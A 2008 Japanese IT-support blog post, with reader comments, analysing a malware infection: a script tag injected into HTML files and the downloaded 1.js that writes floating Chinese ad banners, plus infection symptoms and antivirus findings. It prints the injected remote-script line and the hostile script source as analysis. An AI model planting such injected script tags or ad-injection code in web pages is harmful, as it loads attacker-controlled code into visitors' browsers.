- 2008-03-11 (火) 11:31
- サポート録
HTMLの先頭行に勝手に追加される以下のコード
<script src=”http:://l.52hxsh.com/1.js”></script>
が参照している 1.js をダウンロードしてみた。
以下がソース
document.writeln(”<center>”);
function brand(a)
{
return parseInt((a)*Math.random()+1);
}var hgbnum;
hgbnum=brand(8);if (hgbnum==1)
{
document.writeln(”<div id=\”myads\” style=\”width:209px;height:138px;position:absolute;z-index:30000;bottom:0px;background-color:#ffffff;\”>”);
document.writeln(”<div style=\”height:138\”><a href=\”http:\/\/ad.hhhqd.net\/qb.html\” target=\”_blank\”><img src=\”http:\/\/ok.52hxsh.com\/img\/qb1.gif\” width=\”209\” height=\”138\” border=\”0\”><\/a><\/div>”);
document.writeln(”<\/div>”);
document.writeln(”<script language=\”javascript\”>”);
document.writeln(”function myads(){document.all.myads.style.top=document.body.scrollTop+document.body.clientHeight-138;document.all.myads.style.left=document.body.scrollLeft +document.body.clientWidth-209}”);
document.writeln(”window.setInterval(\”myads()\”,1);”);
document.writeln(”<\/script>”);
}if (hgbnum==2)
{
document.writeln(”<div id=\”myads\” style=\”width:200px;height:130px;position:absolute;z-index:30000;bottom:0px;background-color:#ffffff;\”>”);
document.writeln(”<div style=\”height:130\”><a href=\”http:\/\/ad.hhhqd.net\/qb.html\” target=\”_blank\”><img src=\”http:\/\/ok.52hxsh.com\/img\/qb2.gif\” width=\”200\” height=\”130\” border=\”0\”><\/a><\/div>”);
document.writeln(”<\/div>”);
document.writeln(”<script language=\”javascript\”>”);
document.writeln(”function myads(){document.all.myads.style.top=document.body.scrollTop+document.body.clientHeight-130;document.all.myads.style.left=document.body.scrollLeft +document.body.clientWidth-200}”);
document.writeln(”window.setInterval(\”myads()\”,1);”);
document.writeln(”<\/script>”);
}if (hgbnum==3)
{
document.writeln(”<a href=\”http:\/\/ad.hhhqd.net\/qq.html\” target=\”_blank\”><img src=\”http:\/\/ok.52hxsh.com\/img\/qq3.gif\” width=\”760\” height=\”80\” border=\”0\”><\/a>”);document.writeln(”<div id=\”myads\” style=\”width:200px;height:130px;position:absolute;z-index:30000;bottom:0px;background-color:#ffffff;\”>”);
document.writeln(”<div style=\”height:130\”><a href=\”http:\/\/ad.hhhqd.net\/qb.html\” target=\”_blank\”><img src=\”http:\/\/ok.52hxsh.com\/img\/qb9.gif\” width=\”200\” height=\”130\” border=\”0\”><\/a><\/div>”);
document.writeln(”<\/div>”);
document.writeln(”<script language=\”javascript\”>”);
document.writeln(”function myads(){document.all.myads.style.top=document.body.scrollTop+document.body.clientHeight-130;document.all.myads.style.left=document.body.scrollLeft +document.body.clientWidth-200}”);
document.writeln(”window.setInterval(\”myads()\”,1);”);
document.writeln(”<\/script>”);
}if (hgbnum==4)
{
document.writeln(”<a href=\”http:\/\/ad.hhhqd.net\/qq.html\” target=\”_blank\”><img src=\”http:\/\/ok.52hxsh.com\/img\/qq3.gif\” width=\”760\” height=\”80\” border=\”0\”><\/a>”);document.writeln(”<div id=\”myads\” style=\”width:200px;height:130px;position:absolute;z-index:30000;bottom:0px;background-color:#ffffff;\”>”);
document.writeln(”<div style=\”height:130\”><a href=\”http:\/\/ad.hhhqd.net\/qb.html\” target=\”_blank\”><img src=\”http:\/\/ok.52hxsh.com\/img\/qb3.gif\” width=\”200\” height=\”130\” border=\”0\”><\/a><\/div>”);
document.writeln(”<\/div>”);
document.writeln(”<script language=\”javascript\”>”);
document.writeln(”function myads(){document.all.myads.style.top=document.body.scrollTop+document.body.clientHeight-130;document.all.myads.style.left=document.body.scrollLeft +document.body.clientWidth-200}”);
document.writeln(”window.setInterval(\”myads()\”,1);”);
document.writeln(”<\/script>”);
}if (hgbnum==5 || hgbnum==6)
{
document.writeln(”<a href=\”http:\/\/ad.hhhqd.net\/qb.html\” target=\”_blank\”><img src=\”http:\/\/ok.52hxsh.com\/img\/qb4.gif\” width=\”760\” height=\”80\” border=\”0\”><\/a>”);document.writeln(”<div id=\”myads\” style=\”width:200px;height:130px;position:absolute;z-index:30000;bottom:0px;background-color:#ffffff;\”>”);
document.writeln(”<div style=\”height:130\”><a href=\”http:\/\/ad.hhhqd.net\/qq.html\” target=\”_blank\”><img src=\”http:\/\/ok.52hxsh.com\/img\/qq1.gif\” width=\”200\” height=\”130\” border=\”0\”><\/a><\/div>”);
document.writeln(”<\/div>”);
document.writeln(”<script language=\”javascript\”>”);
document.writeln(”function myads(){document.all.myads.style.top=document.body.scrollTop+document.body.clientHeight-130;document.all.myads.style.left=document.body.scrollLeft +document.body.clientWidth-200}”);
document.writeln(”window.setInterval(\”myads()\”,1);”);
document.writeln(”<\/script>”);
}if (hgbnum==7 || hgbnum==8)
{
document.writeln(”<div id=\”myads\” style=\”width:200px;height:130px;position:absolute;z-index:30000;bottom:0px;background-color:#ffffff;\”>”);
document.writeln(”<div style=\”height:130\”><a href=\”http:\/\/ad.hhhqd.net\/qq.html\” target=\”_blank\”><img src=\”http:\/\/ok.52hxsh.com\/img\/qq1.gif\” width=\”200\” height=\”130\” border=\”0\”><\/a><\/div>”);
document.writeln(”<\/div>”);
document.writeln(”<script language=\”javascript\”>”);
document.writeln(”function myads(){document.all.myads.style.top=document.body.scrollTop+document.body.clientHeight-130;document.all.myads.style.left=document.body.scrollLeft +document.body.clientWidth-200}”);
document.writeln(”window.setInterval(\”myads()\”,1);”);
document.writeln(”<\/script>”);
}
そして新たに同ネットワーク内で2台の感染が確認された。
感染したPCの症状は
- 非常に動作が不安定で重い
- セーフモードではブルースクリーンになって起動できない
追記:STOPエラーの種類は 0×0000007B INACCESSIBLE_BOOT_DEVICE - NOD32をインストールしようとするとインストールウィザードで”次へ”ボタンをクリックすることができない
このような状態で、単体でチェックすることはできない。
そこで、感染したPCのHDDを取り外し、別のPCに接続してNOD32でスキャンを行った。
結果はexeというexeに感染が確認された。中には未知のウイルスの疑いというのも含まれている。
win32/Genetik 亜種
win32/Xorer 亜種
リストに出てくるのはこの2つばかり。
思ったように調査が進まないので続きはまた後日。
- Newer: NOD32 Ver3.0でCPU使用率が100%に
- Older: ブラウザの右下隅に時々中国語の広告が表示される
Comments:5
- kobamix 08-03-12 (水) 10:14
-
当方でも同様の現象が発生し、ウェブ検索しても情報が少ない中、こちらの情報を参考にさせていただきました。
本日、Trend Micro社(英語)のサイトに、同様の現象だと思われる情報がアップされておりました。
HTML_IFRAME.JF
文書の作成日付が(Mar. 11, 2008 3:54:19 AM GMT -0800)となっているので最新の情報だと思います。
いったん怪しいサイトにいくと、別のマルウェアのサイトにつながり、マルウェアプログラムをダウンロードしてしまうが、そこでダウンロードされるファイルはトレンドマイクロでは検出可能といったことが書かれていると思います。 - 田中達也 08-03-13 (木) 1:22
-
>kobamixさん
大変貴重な情報、ありがとうございます。
ウイルスバスタービジネスセキュリティが手元にありますので、早速感染したクライアントのHDDをスキャンしてみ用と思います。
結果は後ほど新しい記事で報告いたします。 - kodama 09-01-30 (金) 15:39
-
当方の会社で、今週の頭くらいから広告が出て、何だろうと怪しんで調べているうち、
こちらのサイトにたどり着きました。
現在、感染PCを探しているところです。駆除についての情報等進展がありましたら、ご提供いただけたらと思います。 - 田中達也 09-02-12 (木) 15:34
-
>kodamaさん
結局、感染したPCはすべてリカバリしました。
その後の対策として、
ネットワーク経路にFortiGateを配置し、マルウェアの検知・駆除を、
クライアントにはNOD32をインストールして保護
ということになりました。このウイルスの性質上、クライアント保護だけでは不安だったというのが理由のひとつです。
- kodama 09-02-12 (木) 16:58
-
田中達也さま
情報ありがとうございます。
とりあえずセーフモードで起動しないPCを探しましたが、
それらしいPCが発見できず、
(1台起動しないノートがあったのですが、そのノートがネットワークにつながっていても症状が出ませんでした)
セーフモードでウィルススキャンを行いました。(主にノートン)
その後、症状が出なくなりました。
とりあえず、症状が無いので静観しているところです。
Trackback+Pingback:0
- TrackBack URL for this entry
- http://blog.add-in.co.jp/blog/archives/30/trackback
- Listed below are links to weblogs that reference
- ブラウザの右下隅に時々中国語の広告が表示される【その2】 from ADD-inのこんなんできるんですか?